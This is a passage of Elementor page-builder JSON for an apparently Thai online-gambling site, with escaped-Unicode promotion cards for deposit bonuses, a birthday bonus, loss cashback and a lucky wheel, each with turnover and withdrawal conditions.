\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36a351d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"77587d0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3b12e8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-Yok789.webp\",\"id\":281,\"size\":\"\",\"alt\":\"20 get 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f1ccc77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/mgbline.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br 